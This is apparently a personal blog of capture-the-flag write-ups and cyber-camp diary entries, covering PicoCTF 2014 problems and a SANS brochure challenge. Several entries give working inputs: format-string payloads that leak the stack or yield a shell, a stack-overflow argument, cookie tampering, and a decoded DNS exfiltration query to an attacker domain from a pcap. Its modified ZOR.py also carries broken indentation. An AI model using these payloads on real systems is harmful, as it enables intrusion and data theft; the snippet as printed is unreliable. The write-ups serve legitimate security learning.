Use every avenue within legal means.  I tried a little social engineering and recon before the challenge.  I'm going to put a disclaimer on this.  This does not mean send a phishing e-mail to your instructor and attempt to own their machine.  This means, ask them what they've been reading.  Ask them what projects they've been working on, ask them what ctf's that they've done before.  Here is why.  People are busy.  Many times, they will reuse material from things that they are working on, reading, or doing.  Sometimes, they even reuse the same challenges.  If you've read my previous blog posts, Shmoocon, and the SANS 2014 Brochure challenge were pretty much the same with minor changes.  Yes, the target may say, “No, I can’t help you,” but it never hurts to ask in a respectful manner.  You never know, they may go for it because that is part of the lesson that they are trying to teach you.  Know human behavior.  If they aren't willing to answer, read their blogs.  You can usually find those things on their blogs.

DO NOT SKIMP on RECON and SCANNING. People quickly dismiss this part of the process without realizing that the creators of the challenge will make the contest much like the real world.  People in the real world make mistakes.  If you focus on the exploits, you’ll never see the easy solutions sitting right in front of you.  Sure, it feels awesome to pop that first shell, but in the real world, we are on a time-limit, we have a scope of what we are allowed to do, and we can’t afford to chase down exploits that could easily be accomplished in other ways like finding a plain text password from a search of user logs that takes about five seconds.  During my research last night, I uncovered this blog:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Notice that many of the privilege “exploits” are actually just social engineering, in other words, knowing human behavior.

I also looked up one of the hostnames because people commonly name their machine whatever OS they are running, and/or the version number.  I didn’t understand the significance of it until today.  I wasn’t entirely wrong.  I just didn’t think that I had all the info that I needed.

I looked up the other OS versions, as well, looking for vulnerabilities for those particular OS's.  If you have notes, for heaven’s sake, share them.  I was so nervous today, that I forgot to share my research.  I spent a long time last night doing research, and that effort wasn’t exactly wasted, because I learned, but it could’ve been more useful. 

Don’t expect metasploit to find everything for you.  You can help narrow down results the night before.  I suggest not waiting until the last night to study and research.

Know your tools.  There were a couple of questions I'm sure that we could have found the answer to if we knew how to use the tools.  We were okay with the tools we learned in class, but lacked skills in other useful tools.

When you find out who your teammates are, make a plan of attack.  Find out what each others strengths and weaknesses are, and play to your strengths.  I suggest having each person take one section of what you have learned and research it extensively.

On the Challenge Day, listen to what the instructors and challenge creators say.  I know, you want to dig right in, but sometimes they give hints on challenge days that you may miss if you’re trying to attack.  Their first advice, go for the low hanging fruit.  Don’t spend hours going into the machine and trying to do the exploits because you might end up losing a lot of points if you’re chasing a tangent that may or may not be the correct solution.

The ctfs, any of them, so I'm not giving anything specific away, have different sections.  Pick a section that you are good at and go for it.  That being said, plan with your teammates on who does what, accordingly.  You do not want to waste time answering the same questions.  It only counts for points one time.

Google your heart out.  You may find the answer that way.

Don’t give up.  Keep trying until that last call.  You may learn something in the process.

Cyber Camp CTF

I survived this week and the ctf.  I'm not allowed to give out any answers for this until the other challenges have been done.  I was fortunate to be assigned to a team of brilliant people.  We ended up in 3rd place.  We were all first year Cyber Camp CTF Competitors, meaning that this was our first time attending this event.  Other teams had the advantage because it was their second+ year.  Thanks for doing such an excellent job, guys!  Thanks to the creators for such a great ctf.  Thanks to the instructors and everyone who took time out of their jobs to run the event.

I was a little disappointed with myself.  The guys knew a bit more Linux than I did, so I stayed off of the boxes and manned the scoreboard, trying to get little 5, 10, and 15 point questions.  Some of the guys didn't have the online challenge experience that I had, though, so I should've at least checked out the file systems because even though I might not know that much, I may know that one thing from other challenges that I have done that would answer higher point questions.  My reasoning for staying off the machines:  We had a limited amount of resources, so I didn't want to slow down their attempts to scan or attack.  There are also a couple of questions that I knew the answer to, but didn't trust myself to answer properly, so I wasted time googling, even though I knew the answer.  Alex Rams told me to believe in myself.  I should've taken his advice.  I'm still happy with the result, but unhappy that I didn't challenge myself this time around.  I had to think of what was best for the team though, and sometimes, what's best is to be the research person.

I think that this challenge was well worth the investment that my family made in it.  I have new resources to hone my skills.  I met a lot of interesting people.

Cyber Camp-Day 2

Today was a decent day.  I had a connectivity issue with a couple of my VM's because I had to use a bridged connection in VMWare Fusion.  I'm using a MAC.  That was a headache.  Fortunately someone helped me figure it out.  Thanks person who I-don't-know-if you-want-a-shout-out-or-not.  Also, thanks to the other person that helped me change the config files yesterday to facilitate communication via my VM's.  That course, yesterday, was made for Windows hosts.

I thought that I would post for future me or anyone else who may find it useful.

In order for the bridged connection to work for my VM's, I had to go to Virtual Machine Settings>Network Adapter>Wi-Fi>Adapter>System Preferences>Advanced Button>Set Elevator Box to "Manually">Type in an IP Address in the same range as my VM's Network IP's>Type in the same subnet mask as my VM's>Make sure that the Wi-Fi is connected to a Wireless Access Point and is on

Then I followed the directions in my lab to set the IP's and subnet masks of the VM's.

Note:  It does not have to be a Wi-Fi Adapter.  Later I configured a wired adapter in the same manner.  The key is to make sure that whatever medium you are using is plugged in to a working port on a nework switch or that the Wi-Fi is connected to a wireless access point.  Also, make sure that your VM Firewalls and host firewalls are not getting in the way of communication.

After that the course went fairly smoothly with the exception of one minor glitch that was not my fault.  One lab went pear shaped when we couldn't connect to the machines that we were supposed to.  They got it up and running fairly quickly.

These courses seem to be previews for SANS courses.  It's nice that we are doing different courses each day, but there is some material that I wish we had time to study more in depth.

Cyber Camp-Day 1

Today was an interesting day.
1). Never rely on public transport.  Being stuck in an unfamiliar area, in the pouring down rain is not my idea of a good time.

2). Don't buy a computer with an unfamiliar OS right before a class.  I was tempted by the shiny specs.  I ended up okay, but it made me a bit nervous.

3). Make sure that you come prepared.  Our class material was destributed on CD's.  Fortunately, I packed an external dvd player, patch cable, and an ethernet adapter.  I did not have something to decompress a 7z file on my host OS.  I had to open my SIFT VM, decompress the file, and move it to the host machine.  It took longer than necessary.

I'm not exactly sure what I'm allowed to discuss about the class.  I will say that it was extensive.  I'm not sure how much will sink in.  It was well worth doing Cyber Quest.  They were not kidding when they said that the instructors are top notch.

Picoctf 2014 Repeating XOR

I wasn't exactly sure how to approach this one, given that I don't have a lot of experience with XORing.  I think that I understand the basic idea of it.  Hex Plain Text XOR Hex Key = Hex Encoded Data.  If you know hex plain text, and you have the hex encoded version of that same hex plain text, then you should theoretically get the hex key of that data by XORing the hex plaintext with the hex encoded data of that same plaintext.  Then you can use that key to break the rest of this encoding.  This is kind of what Alan Turing did to break the enigma cipher.  He used plain text and the encrypted text of that plain text to find the key.  

I was reading about Hamming Distance.  From what I understand, the key length can be guessed fairly accurately by comparing each hex pair.  If the hex pairs are of similar Hamming Distances, then they are most likely encoded with the same hex pair.  So, if they were 10 characters apart, then the key length is 10.  I need to do further reading about this and experiment with it to see if I can better understand it.

After searching Google for a while, I stumbled upon a tool called "XorTool" on GitHub.  I'm using VM's, so I downloaded, scanned, and installed it.  Then I set about learning how to use it.  I was given the hint that the key length may be 10.  I was also told that the plaintext was a "history of cryptography", so I had a good idea of what I was looking for.  I let the tool do the work for me.  I just typed, xortool -x -l 10 encrypted.  -x told the program that the file was hex encoded, -l told the program that I was guessing a key length of 10, and encrypted was the name of the encrypted file.  It guessed that the most likely length was 10.  So then I ran the following command and got the following output.

$ xortool -x -o encrypted

The most probable key lengths:

   2:   9.7%

   5:   14.5%

   8:   7.2%

  10:   20.7%

  12:   6.0%

  15:   8.9%

  20:   12.8%

  25:   5.7%

  30:   8.5%

  40:   6.1%

Key-length can be 5*n

100 possible key(s) of length 10:

\x94\xd6\xb1\xc2\xbc\t\x05\xd6\x1c6

\x95\xd7\xb0\xc3\xbd\x08\x04\xd7\x1d7

\x96\xd4\xb3\xc0\xbe\x0b\x07\xd4\x1e4

\x97\xd5\xb2\xc1\xbf\n\x06\xd5\x1f5

\x90\xd2\xb5\xc6\xb8\r\x01\xd2\x182

...

Found 51 plaintexts with 95.0%+ printable characters

See files filename-key.csv, filename-char_used-perc_printable.csv

After this, I read filename-char_used-perc_printable.csv.  This gave me a decent idea of which keys were correct, because it told me the percentage of the characters in each potential key that were printable.  Xortool saves possible plain text files as out files.  I navigated to the folder that contains these out files.  I just used cat <numberIwasinterestedin>.out in my terminal, and it printed out the out file.  I only printed the texts with 100 percent printable characters.  There were only 7, so it made finding the correct decrypted file really easy.

$cat 94.out

your flag is: ab2614e35e828a602c50ebc9b0f5d710e2312388

On 17 March 1975, the proposed DES was published in the Federal Register. Public comments were requested, and in the following year two open workshops were held to discuss the proposed standard. There was some criticism from various parties, including from public-key cryptography pioneers Martin Hellman and Whitfield Diffie, citing a shortened key length and the mysterious "S-boxes" as evidence of improper interference from the NSA. The suspicion was that the algorithm had been covertly weakened by the intelligence agency so that they - but no-one else - could easily read encrypted messages. Alan Konheim (one of the designers of DES) commented, "We sent the S-boxes off to Washington. They came back and were all different." The United States Senate Select Committee on Intelligence reviewed the NSA's actions to determine whether there had been any improper involvement. In the unclassified summary of their findings, published in 1978, the Committee wrote:

    In the development of DES, NSA convinced IBM that a reduced key size was sufficient; indirectly assisted in the development of the S-box structures; and certified that the final DES algorithm was, to the best of their knowledge, free from any statistical or mathematical weakness.

However, it also found that

    NSA did not tamper with the design of the algorithm in any way. IBM invented and designed the algorithm, made all pertinent decisions regarding it, and concurred that the agreed upon key size was more than adequate for all commercial applications for which the DES was intended.

Another member of the DES team, Walter Tuchman, stated "We developed the DES algorithm entirely within IBM using IBMers. The NSA did not dictate a single wire!" In contrast, a declassified NSA book on cryptologic history states:

    In 1973 NBS solicited private industry for a data encryption standard (DES). The first offerings were disappointing, so NSA began working on its own algorithm. Then Howard Rosenblum, deputy director for research and engineering, discovered that Walter Tuchman of IBM was working on a modification to Lucifer for general use. NSA gave Tuchman a clearance and brought him in to work jointly with the Agency on his Lucifer modification."

and

    NSA worked closely with IBM to strengthen the algorithm against all except brute force attacks and to strengthen substitution tables, called S-boxes. Conversely, NSA tried to convince IBM to reduce the length of the key from 64 to 48 bits. Ultimately they compromised on a 56-bit key.

Some of the suspicions about hidden weaknesses in the S-boxes were allayed in 1990, with the independent discovery and open publication by Eli Biham and Adi Shamir of differential cryptanalysis, a general method for breaking block ciphers. The S-boxes of DES were much more resistant to the attack than if they had been chosen at random, strongly suggesting that IBM knew about the technique in the 1970s. This was indeed the case; in 1994, Don Coppersmith published some of the original design criteria for the S-boxes. According to Steven Levy, IBM Watson researchers discovered differential cryptanalytic attacks in 1974 and were asked by the NSA to keep the technique secret. Coppersmith explains IBM's secrecy decision by saying, "that was because [differential cryptanalysis] can be a very powerful tool, used against many schemes, and there was concern that such information in the public domain could adversely affect national security." Levy quotes Walter Tuchman: "[t]hey asked us to stamp all our documents confidential... We actually put a number on each one and locked them up in safes, because they were considered U.S. government classified. They said do it. So I did it". Bruce Schneier observed that "It took the academic community two decades to figure out that the NSA 'tweaks' actually improved the security of DES."

Picoctf 2014 Guess

On this problem, I had to guess a random 32 bit integer.  I had 2^32 chance of getting it right, making it very unlikely that I would actually be able to guess the number.
I studied the source program, which was written in C, and noticed that the "fgets(name, sizeof(name), stdin);" part of it was exploitable by a format string vulnerability.  I noticed that the variable that I
wanted, f, was the fourth integer on the stack.  So, when the program asked my name, I typed in %d.%d.%d.%d, and it printed four numbers that were separated by periods so that I could read them more easily.  When it asked me to type in my guess,
I typed in the fourth number that had printed out, and got the flag:  leak_the_seakret.

#include <stdio.h>
#include <stdlib.h>

char *flag = "~~FLAG~~";

void main(){
    int secret, guess;
    char name[32];
    long seed;

    FILE *f = fopen("/dev/urandom", "rb");
    fread(&secret, sizeof(int), 1, f);
    fclose(f);

    printf("Hello! What is your name?\n");
    fgets(name, sizeof(name), stdin);

    printf("Welcome to the guessing game, ");
    printf(name);
    printf("\nI generated a random 32-bit number.\nYou have a 1 in 2^32 chance of guessing it. Good luck.\n");

    printf("What is your guess?\n");
    scanf("%d", &guess);

    if(guess == secret){
        printf("Wow! You guessed it!\n");
        printf("Your flag is: %s\n", flag);
    }else{
        printf("Hah! I knew you wouldn't get it.\n");
    }
}

$ nc vuln2014.picoctf.com 4546
\Hello! What is your name?
%d.%d.%d.%d
Welcome to the guessing game, \32.-143668192.162005000.-857849444

I generated a random 32-bit number.
You have a 1 in 2^32 chance of guessing it. Good luck.
What is your guess?
-857849444
Wow! You guessed it!
Your flag is: leak_the_seakret

Picoctf 2014 Format String

I just completed the format string problem.  I took a semester of C a long time ago, but I remembered enough to know what was going on in the program that I was given to exploit.  I used gdb -q ./format, then p &secret to find the location of the variable of secret in memory.  Then I ran the program:

./format $(python -c 'print "%x.%x.%x"').

%x prints addresses in the stack.  I put a dot between them so that I could see where each ended. I kept adding a %x. until I found the address that I needed.  I found out that the 7th address was the address that I needed.  It was 0x0804a030.  The hint said that %n would be useful.  I tried it, but I just couldn't get it to work correctly.  Then I found some nice articles that helped to explain format string vulnerabilities fairly well.  They were:  http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html, and https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf.  So then I ran the program with ./format $(python -c 'print "%1337x%7$n"').  The %1337x pads an unsigned hexidecimal integer with 1337 spaces.  The %7$n specifies that I want the 7th address location, and n means that I want to write the number of bytes written so far to that place in memory.  I got shell.  Then I typed "cat flag.txt" and got the flag which was who_thought_%n_was_a_good_idea?

SANS@Night

My spouse was kind enough to request that I get a badge so that I could attend some SANS@night presentations.  I've only been to two, because there are many of them that my spouse would like to attend, and someone has to watch the kids.

The first one that I attended was a SANS WIT presentation.  Their hash tag is #SANS_WIT.  It was a networking event for women to meet other women in technology, and to learn about SANS programs that may help women.  I can't discuss specifically what was in the presentation, but suffice it to say, if you are a woman, interested in the IT field, you may want to attend one of these presentations.  I felt awkward.  I'm a stay at home mom listening to ladies say, "I'm the Chief Security Officer at ...". They asked what I did.  I feel like I probably sounded like a country bumpkin.  "I'm just a stay at home mom who has done a couple consulting/contract jobs from home, and I do pen-testing/digital forensics challenges for fun."  I told them that I was invited to an invite only cyber camp in my state.  It didn't help that I had recently lost some weight, so I was wearing pants and a shirt that was hanging off of me.  Those were my issues, though, not the other ladies.  They seemed like nice people.

The second one was Securing Your Kids.  Most of the information was common sense practices that most people would do, but there were some insightful ideas given by other parents, so it may be worth attending.  I was tempted to skip this one and attend more technical presentations.

Cyber Quest

I can't give the answers to Cyber Quest.  They may reuse the questions.  I did do Cyber Quest, though.  http://uscc.cyberquests.org. This year's challenge focused on secure programming practices in some popular programming languages.  I did well enough that I have been invited to a invite only cyber camp in my state.  I'm looking forward to it, but I'm slightly nervous.  It will be in an area that I'm not really familiar with.  I'm doing research about how to get around, and about the crime in the area.  I wish that I knew more people so that I could hitch a ride with someone and let them figure out the details.  I'm also nervous about how little I know compared to others.  My spouse, who is attending SANS Fire, quoted John Strand to try and convince me that things should be okay.  John Strand says that there will always be someone smarter than you are, but you shouldn't let that deter you from trying.

2015 Orlando Brochure Challenge Solution

SANS 2015 Orlando Brochure Challenge Solution

I had to wait until the deadline passed in order to submit my write up of this challenge.  The last entry date to be eligible for a prize was 4/20/2015.

The first part of the challenge was simple.  It was three numbers separated by commas.  For example, 6,1,2.  These numbers corresponded to the page, paragraph, and word, respectively.  The answer was:  The password to the next part is pyWars.  Be be to “play fair”.  The flag for this part was pyWars.

“Play fair” was the hint to the next challenge.  I had never heard of a “Playfair” cipher until I used Google to find out what kind of cipher that the next part of the challenge could be.  I decoded the cipher using an online tool, called the Braingle Playfair Decoder, that omitted q’s, and deciphered the Playfair cipher for me.  The key was pyWars, which was given in the first part of the challenge.  I noticed that I had to remove the x’s.  Once deciphered, it was http://wwxw.sans.org/event/sans-twothousandandfifteen/brochure-challenge-nineninefivecazeroethreedefourninecczeroedthrexefivebfiveeightdfiveeninedax, or http://www.sans.org/event/sans-2015/brochure-challenge-995ca0e3de49cc0ed35b58d5e9da  The flag for this part was SeeYouInOrlando2015.

The last part was a little more challenging.  I had to analyze a pcap and extract a flag from it.  The hint was given that the creator was suspicious that powercat.ps1 was used to extract the flag from the computer that the creator of the challenge was using.  Looking at the pcap, I noted that it was all DNS traffic and that the query types were TXT.  I’m not familiar with powercat, so I look up the documentation about it.  Then for good measure, I look up TXT queries to see what they are.  I noted that the response answers were text, so I tried in vain to decode them with a hex to text decoder from http://www.asciitohex.com.  Then I realized that I was looking at the wrong part.  I needed to know what the attacker was asking.  So, I tried to decode the hex of the queries into ascii format.  That didn't work.  I noted that Wireshark had "TXT String" under the type of DNS query, so I found a hex to string decoder, on http://www.string-functions.com, and sure enough, the first record that I looked at said, “cmd.exe”  It wasn’t long before I found a record, packet 103, that had this query:

6a040137d56005e844747970652062726f63687572655f666c61672e7478.740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c.62726f63687572653e.c2.xattackers-domain.com

It decoded to “type brochure_flag.tx?”.  Then it showed a jumble of weird characters.  Obviously, there was some reason that I wasn’t getting the correct flag after that command.  I took the hex on that query apart, cutting out the part where the flag should be typed.  I suspected that I could use the periods in the query as a delimiter.  So, I took out the middle part of the query:

740a464c41473d42726f63687572655377616e4d69636b65790d0a433a5c

I used the converter on this part alone, and I got the last flag which was BrochureSwanMickey.

More PicoCTF 2014 Solutions-Next 12

I haven't been working on this that much. I wasn't eligible for the rewards, but I started it because I saw it as a good opportunity to learn. I am eligible for other challenge rewards though, so those have been at the top of my priority list lately. I'm currently doing Cyber Aces, and later this month, I plan to try the US Cyber Challenge. I've had a little time lately, so here are more Picoctf 2014 solutions.

Javascrypt
I looked at the website with Mozilla Firefox, and right-clicked, and clicked on View Source. I read through it until I found a piece of javascript that appeared to generate the key. I copy and pasted it into a javascript editor that I had found via Google and added html code so that I could make it calculate and display the key for me in a nice manner. Here is my code:
<!DOCTYPE html>
<html>
<body>
<p>What is the key?</p>
<p_id="demo"></p>
<script>
function generateKey() {
var i =1;
var x = 208;
var n = 5493;
while (i <= 25) {
x = (x *i) % n;
i++;
}
key = "flag_" + Math.abs(x);
}
generateKey();
document.getElementById("demo").innerHTML = key;
</script>
</body>
</html>
My flag was flag_1596.

Easy Overflow

In Java, the max value of a 32 bit signed integer is 2,147,483,647. In order to cause an overflow, all I had to do was to add the max number to the number that I was given. (I'm not exactly sure how that caused the number to become negative, because I haven't studied memory registers in great depth. I plan to do that soon.) I understand the idea of an overflow, in other words, memory registers only hold so big of values, and when one register can't hold a value, because it's too big, the rest of that value overflows into another part of memory, hence the term "overflow". I don't understand exactly how that works. I just vaguely remembered in java that we had to assign values according to size, and that each type could only hold so much. That's the reason that I knew the max value for a java 32 bit signed integer. My number was 4706106. Adding the max value that a Java integer could hold caused the number to be -2142777543. The flag was That_was_easssy!

Write-Right
I used the Linux tool called GnuDebugger: gdb -q and then typed p &secret to get the memory address of secret . I just looked for the memory address of secret and took note of it. The address was 804a03c. Then I ran the program and answered the question, "Where would you like to write in memory?" with the address of secret, and answered the question, "What would you like to write there?" with 1337beef. Then I was given the flag. The flag was arbitrary_write_is_always_right

Overflow 1
This challenge had a nice interactive feature to help one understand how the machine places values into memory. The server happens to use Little Endian format, which means that it stores the least significant byte in the smallest address. My objective was to overwrite the value of secret to hexidecimal c0deface. I looked at how someone solved a similar problem in picoctf2013 to get an idea of how to solve this one, and utilized that knowledge to solve this problem. Most Linux systems have a python interpreter installed, so I just used python. ./overflow1 $(python -c 'print "A"*16 + "\xce\xfa\xde\xc0"'). I got a shell. Then I just typed ls, to list what in the directory, and used cat flag.txt to get the flag: ooh_so_critical. If I'd overshot that narrow point in memory, which is allowed to be written in, then I would've gotten a segmentation fault for trying to write to an area in memory that is read only. I recently read a nice article about it called, "Smashing the Stack for Fun and Profit" by Aleph One. I didn't understand all of it because I'm not familiar with assembly, but I highly recommend it to read. It's an interesting view into memory.

Redacted
I just copied the page using the press-and hold on the screen of my iPad, and pasted the page into my Notes app. It saved the page. The background was black, and the text was white. There were no more black boxes on the page in my Notes app, so I could read the entire page.

Toaster Control
I looked at the source code of the page. In the javascript, I found the handlers for the other buttons, so I knew how to query the db for the action that I needed, which was Shutdown & Turn Off. The handler had to be url encoded. I looked up those encodings on Google. So the full address was web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off.

ZOR**Update**

Thanks to Anonymous' comment "dog crap", :D, I noticed that I forgot to add the new "solution" method to the terminal command and a couple of typos.  I added the original program and modified version to hopefully make the solution more clear.  Thanks!  If you all notice anymore typos/errors, let me know.  I'll be happy to fix them.  This blog is more like a journal.  I reference it if I have trouble remembering something; so I'd like it to be as accurate as possible.

The hint states that the key is turned into a one byte binary key, which means that there are only 255 possible values that the key could be. The 00000000 byte doesn't count. All I had to do was to modify the ZOR.py program and add a solution method. Then I had to add a call to that method in the main funtion. All that the solution method does is to use the xor method already present in the program to test every possible key from 00000000-11111111. (I know, I said that the 0 byte didn't count. It was just plain easier to figure out the syntax.) It took me a while to figure out the syntax because I'm not familiar with python. I just copied the syntax of the other methods, and it worked just fine. I did have previous experience with Java, so I could understand the idea of what the program was doing. The main annoyance was the indenting.  (If it doesn't work, play around with the indenting.  I copied the syntax of the methods around it.  Another item of note:  sometimes some text editors can cause issues with the python program working properly, so be careful with which ones you use.  For some reason, lately, I've also noticed that if you don't specify an encoding, python doesn't particularly care for that either.)

The solution method:

def solution(input_data):
    decrypted = ""
        for key in range (0,255):
            decrypted += xor(input_data, key)
            decrypted += " begin/end "
        return decrypted

I used the "decrypted += " begin/end " line so that I could tell where each separate attempt began and ended. I guess that I could've used a newline character, to make it easier to read.


The calling method: I added it right under the decrypt elif statement.

elif sys.argv[1] == "solution":
    result_data = solution(input_data)

I ran the program from the command line by typing, "python ZOR.py solution encrypted decrypedfile 25"
I added the 25 at the end to get past that annoying 5 char requirement at the beginning of the program. I could probably just remove that "if len (sys.argv) < 5: Usage()" line from the program, and not worry about that.
After running the file, I looked at the file by using "cat decryptedfile | less". When you print out the decrypted file, you'll see all sorts of junk because it is printing out every possible key value.  If you look through the junk, you'll eventually see this:

This message is for Daedalus Corporation only. Our blueprints for the Cyborg are protected with a password. That password is 85bcdc9f283353a3e0ca9c4cc1c0dc

Here is the original program:

#!/usr/bin/python

import sys

"""
Daedalus Corporation encryption script.
"""

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)

    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)

    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()

    input_data = open(sys.argv[2], 'r').read()
    result_data = ""

    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()

    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

Here is the modified program:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import sys

"""
Daedalus Corporation encryption script.
"""

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)

    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)

    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def solution(input_data):
    decrypted = ""
        for key in range (0, 255):
            decrypted += xor(input_data, key)
            decrypted += " begin/end "
        return decrypted

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()

    input_data = open(sys.argv[2], 'r').read()
    result_data = ""

    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])

    elif sys.argv[1] == "solution":
        result_data = solution(input_data)
    else:
        usage()

    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

Substitution
This one was easy. I found a nice website using google called cryptoclub.org. They have a nice Flash Substitution Decrypter. The hint in this challenge states to use frequency analysis to solve this puzzle. However, I decided to try to find the word authorization since I was fairly certain that that word was in the cipher, considering that I was looking for an authorization code. The only word that seemed long enough to be authorization was right at the beginning of the cipher, so I just replaced those encrypted letters with the decrypted letters for authorization. It turned out to be correct. Then I solved the words, "the", "code", and "is". After that, finding the substitutions for the other words weren't that difficult because there were recognizable words. The authorization code is "motherknowsbest". That was the flag for this challenge. The encrypted file ended up being a song from the movie Tangled, called "Mother Knows Best".
syhuwamrefcdvklbqxipjnzgto plaintext
abcdefghijklmnopqrstuvwxyz encrypted letters

Function Address
I used the Linux tool GnuDebbuger gdb -q. Then I just used p &find_string to find the find_string function, and took down the address of that function. The address was the flag for this challenge.

Basic ASM
I don't have any experience with assembly, however, the creators of picoctf had examples of some nice tutorials on the subject of AT&T assembly, so I was able to solve the problem by looking at the tutorials, and changing the assembly code to pseudo-code to help visualize the problem. I was supposed to find the value of %eax before the NOP in L3.
The original code was:
MOV $26693, %ebx
MOV $979, %eax
MOV $25717 %ecx
CMP %eax, %ebx
JL L1
JMP L2
L1:
IMUL %eax, %ebx
ADD %eax, %ebx
MOV %ebx, %eax
SUB %ecx, %eax
JMP L3
L2:
IMUL %eax, %ebx
SUB %eax, %ebx
MOV %ebx, %eax
ADD %ecx, %eax
JMP L3
L3:
NOP
My pseudocode. It helped to remember that the left side was the source, and the right side was the destination. Considering that in the assembly language, the value of %ebx is greater than the value of %eax, the L1 label computations were not done. So, the computations start in the L2 label.
ebx = 26693
eax = 997
ecx = 25717
If ebx < eax
goto L1
else
goto L2
L1:
ebx *= eax;
ebx += eax;
eax = ebx;
eax -= ecx;
goto L3:
L2:
ebx *= eax; //26693 *979, ebx = 26132447
ebx -= eax; //26132447- 979= 26131468, ebx = 26131468
eax = ebx; //eax = 26131468
eax += ecx; //26131468 + 25717, eax = 26157185
goto L3:
L3;
NOP
So the answer of "What is the value of %eax before the NOP operation?" is 26157185.

Spoof Proof
This one was really easy. I'm supposed to find the name of the person that doesn't belong in the network. I first looked at the ARP traffic for any ARP poisoning.  I used Wireshark to analyze the traffic. (You can sort by protocol by clicking on the "Protocol" column.)  Wireshark has a nice feature that tells when there are gratuitous ARP requests, (under Expert Information) and when it suspects that more than one machine is using the same IP Address. I found that the IP Address 192.168.50.4 had two MAC Addresses associated with it. I assumed that the MAC Address that was noted earlier in the traffic, before the potentially malicious activity, was the legitimate address, in other words, the address of the machine that is supposed to be on the network. I did a search for the other MAC Address and found that it was associated with the IP Address, 192.168.50.3, which is the IP Address of a user named John Johnson. John Johnson was spoofing an IP Address.

Delicious
In order to solve Delicious, I looked at the website. On the website, there was a session id. Websites use session cookies in order to keep track of sessions because http is a stateless protocol, in other words, it can't remember whether people had connected previously or not on its own. So, I installed an Add-On to my browser called Mozilla Firefox Cookie Editor. I changed the session_id of the cookie to 30. I was logged in as Dr. Florian Richards. The secret code was session_cookies_are_the_most_delicious.